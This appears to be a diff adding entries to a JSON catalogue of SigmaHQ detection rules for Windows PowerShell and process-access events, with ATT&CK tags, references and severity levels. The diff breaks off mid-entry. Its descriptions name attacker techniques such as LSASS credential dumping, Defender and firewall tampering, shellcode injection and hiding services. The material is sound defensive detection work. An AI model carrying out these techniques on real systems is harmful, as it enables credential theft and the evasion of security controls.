+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
+ "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c",
+ "value": "Suspicious PowerShell WindowStyle Option",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.003"
+ ],
+ "creation_date": "2021/10/20",
+ "filename": "posh_ps_susp_windowstyle.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of the \"Write-EventLog\" cmdlet with 
'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use",
+ "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e",
+ "value": "PowerShell Write-EventLog Usage",
+ "meta": {
+ "refs": [
+ "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion"
+ ],
+ "creation_date": "2022/08/16",
+ "filename": "posh_ps_susp_write_eventlog.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration",
+ "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9",
+ "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1074.001"
+ ],
+ "creation_date": "2021/07/20",
+ "filename": "posh_ps_susp_zip_compress.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.",
+ "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218",
+ "value": "SyncAppvPublishingServer Execution to Bypass Powershell 
Restriction",
+ "meta": {
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ],
+ "creation_date": "2020/10/05",
+ "filename": "posh_ps_syncappvpublishingserver_exe.yml",
+ "author": "Ensar \u015eamil, @sblmsrsn, OSCD Community",
+ "level": "medium",
+ "falsepositive": [
+ "App-V clients"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.",
+ "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2",
+ "value": "Tamper Windows Defender - ScriptBlockLogging",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
+ "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
+ "https://bidouillesecurity.com/disable-windows-defender-in-powershell/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/01/16",
+ "filename": "posh_ps_tamper_defender.yml",
+ "author": "frack113, elhoim",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate PowerShell scripts"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet",
+ "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458",
+ "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging",
+ "meta": {
+ "refs": [
+ 
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2022/08/05",
+ "filename": "posh_ps_tamper_defender_remove_mppreference.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate PowerShell scripts"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n",
+ "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06",
+ "value": "Testing Usage of Uncommonly Used Port",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell",
+ "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1571"
+ ],
+ "creation_date": "2022/01/23",
+ "filename": "posh_ps_test_netconnection.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate administrative script"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the 
modify, access, create, and change times), often to mimic files that are in the same folder.\n",
+ "uuid": "c6438007-e081-42ce-9483-b067fbef33c3",
+ "value": "Powershell Timestomp",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md",
+ "https://www.offensive-security.com/metasploit-unleashed/timestomp/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1070.006"
+ ],
+ "creation_date": "2021/08/03",
+ "filename": "posh_ps_timestomp.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate admin script"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.",
+ "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152",
+ "value": "Powershell Trigger Profiles by Add_Content",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1546.013"
+ ],
+ "creation_date": "2021/08/18",
+ "filename": "posh_ps_trigger_profiles.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command",
+ "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb",
+ "value": "Windows PowerShell Upload Web Request",
+ "meta": {
+ "refs": [
+ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md",
+ "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml"
+ ],
+ "tags": [
+ "attack.exfiltration",
+ "attack.t1020"
+ ],
+ "creation_date": "2022/01/07",
+ "filename": "posh_ps_upload.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate script"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file",
+ "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9",
+ "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell",
+ "meta": {
+ "refs": [
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1033"
+ ],
+ "creation_date": "2022/11/17",
+ "filename": "posh_ps_user_discovery_get_aduser.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)",
+ "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da",
+ "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS",
+ "meta": {
+ "refs": [
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
+ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1574.011"
+ ],
+ "creation_date": "2022/10/17",
+ "filename": "posh_ps_using_set_service_to_hide_services.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "high",
+ "falsepositive": [
+ "Rare intended use of hidden services",
+ "Rare FP could occure due to the non linearity of the ScriptBlockText log"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs",
+ "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba",
+ "value": "Usage Of Web Request Commands And Cmdlets - PowerShell",
+ "meta": {
+ "refs": [
+ "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
+ "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2019/10/24",
+ "filename": "posh_ps_web_request_cmd_and_cmdlets.yml",
+ "author": "James Pemberton / @4A616D6573",
+ "level": "medium",
+ "falsepositive": [
+ "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class",
+ "uuid": "91109523-17f0-4248-a800-f81d9e7c081d",
+ "value": "PowerShell WMI Win32_Product Install MSI",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.007"
+ ],
+ "creation_date": "2022/04/24",
+ "filename": "posh_ps_win32_product_install_msi.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.",
+ "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d",
+ "value": "Windows Firewall Profile Disabled",
+ "meta": {
+ "refs": [
+ "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps",
+ "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell",
+ "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php",
+ "http://woshub.com/manage-windows-firewall-powershell/",
+ "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.004"
+ ],
+ "creation_date": "2021/10/12",
+ "filename": "posh_ps_windows_firewall_profile_disabled.yml",
+ "author": "Austin Songer @austinsonger",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ 
"logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n",
+ "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0",
+ "value": "Winlogon Helper DLL",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1547.004"
+ ],
+ "creation_date": "2019/10/21",
+ "filename": "posh_ps_winlogon_helper_dll.yml",
+ "author": "Timur Zinniatullin, oscd.community",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions",
+ "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88",
+ "value": "Windows Defender Exclusions Added - PowerShell",
+ "meta": {
+ "refs": [
+ "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562",
+ "attack.execution",
+ "attack.t1059"
+ ],
+ "creation_date": "2022/09/16",
+ "filename": 
"posh_ps_win_defender_exclusions_added.yml",
+ "author": "Tim Rauch",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects parameters used by WMImplant",
+ "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7",
+ "value": "WMImplant Hack Tool",
+ "meta": {
+ "refs": [
+ "https://github.com/FortyNorthSecurity/WMImplant",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2020/03/26",
+ "filename": "posh_ps_wmimplant.yml",
+ "author": "NVISO",
+ "level": "high",
+ "falsepositive": [
+ "Administrative scripts that use the same keywords."
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.",
+ "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85",
+ "value": "Powershell WMI Persistence",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md",
+ "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.t1546.003"
+ ],
+ "creation_date": "2021/08/19",
+ "filename": "posh_ps_wmi_persistence.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects known WMI recon method to look for unquoted service 
paths, often used by pentest inside of powershell scripts attackers enum scripts",
+ "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b",
+ "value": "WMIC Unquoted Services Path Lookup - PowerShell",
+ "meta": {
+ "refs": [
+ "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py",
+ "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1",
+ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ],
+ "creation_date": "2022/06/20",
+ "filename": "posh_ps_wmi_unquoted_service_search.yml",
+ "author": "Nasreddine Bencherchali",
+ "level": "medium",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n",
+ "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b",
+ "value": "Powershell XML Execute Command",
+ "meta": {
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.001"
+ ],
+ "creation_date": "2022/01/19",
+ "filename": "posh_ps_xml_iex.yml",
+ "author": "frack113",
+ "level": "medium",
+ "falsepositive": [
+ "Legitimate administrative script"
+ ],
+ "logsource.category": "ps_script",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject",
+ "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da",
+ "value": "Shellcode Injection",
+ "meta": {
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1055"
+ ],
+ "creation_date": "2022/03/11",
+ "filename": "process_access_win_shellcode_inject_msf_empire.yml",
+ "author": "Bhabesh Raj",
+ "level": "high",
+ "falsepositive": [
+ "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well"
+ ],
+ "logsource.category": "process_access",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"",
+ "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7",
+ "value": "Suspicious LSASS Access Via MalSecLogon",
+ "meta": {
+ "refs": [
+ "https://twitter.com/SBousseaden/status/1541920424635912196",
+ 
"https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml",
+ "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001"
+ ],
+ "creation_date": "2022/06/29",
+ "filename": "process_access_win_susp_seclogon.yml",
+ "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_access",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution",
+ "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95",
+ "value": "CMSTP Execution Process Access",
+ "meta": {
+ "refs": [
+ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218.003",
+ "attack.execution",
+ "attack.t1559.001",
+ "attack.g0069",
+ "attack.g0080",
+ "car.2019-04-001"
+ ],
+ "creation_date": "2018/07/16",
+ "filename": "proc_access_win_cmstp_execution_by_access.yml",
+ "author": "Nik Seetharaman",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate CMSTP use (unlikely in modern enterprise environments)"
+ ],
+ "logsource.category": "process_access",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes",
+ "uuid": "09706624-b7f6-455d-9d02-adee024cee1d",
+ "value": "CobaltStrike BOF Injection Pattern",
+ "meta": {
+ "refs": [
+ 
"https://github.com/boku7/injectAmsiBypass",
+ "https://github.com/boku7/spawn",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1106",
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ],
+ "creation_date": "2021/08/04",
+ "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml",
+ "author": "Christian Burkard",
+ "level": "high",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "logsource.category": "process_access",
+ "logsource.product": "windows"
+ }
+ },
+ {
+ "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools",
+ "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d",
+ "value": "Credential Dumping Tools Accessing LSASS Memory",
+ "meta": {
+ "refs": [
+ "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
+ "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1003.001",
+ "attack.s0002",
+ "car.2019-04-004"
+ ],
+ "creation_date": "2017/02/16",
+ "filename": "proc_access_win_cred_dump_lsass_access.yml",
+ "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)",
+ "level": "high",
+ "falsepositive": [
+ "Legitimate software accessing LSASS process for legitimate reason; please add more filters"
+ ],
+ 
"logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "value": "Direct Syscall of NtOpenProcess", + "meta": { + "refs": [ + "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ], + "creation_date": "2021/07/28", + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml", + "author": "Christian Burkard, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "value": "SysmonEnte Usage", + "meta": { + "refs": [ + "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html", + "https://github.com/codewhitesec/SysmonEnte/", + "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/07", + "filename": "proc_access_win_hack_sysmonente.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "value": "HandleKatz Duplicating LSASS 
Handle", + "meta": { + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1003.001" + ], + "creation_date": "2022/06/27", + "filename": "proc_access_win_handlekatz_lsass_access.yml", + "author": "Bhabesh Raj (rule), @thefLinkk", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "value": "Suspect Svchost Memory Asccess", + "meta": { + "refs": [ + "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2020/01/02", + "filename": "proc_access_win_invoke_phantom.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "value": "Credential Dumping by LaZagne", + "meta": { + "refs": [ + "https://twitter.com/bh4b3sh/status/1303674603819081728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" + ], + "creation_date": "2020/09/09", + "filename": 
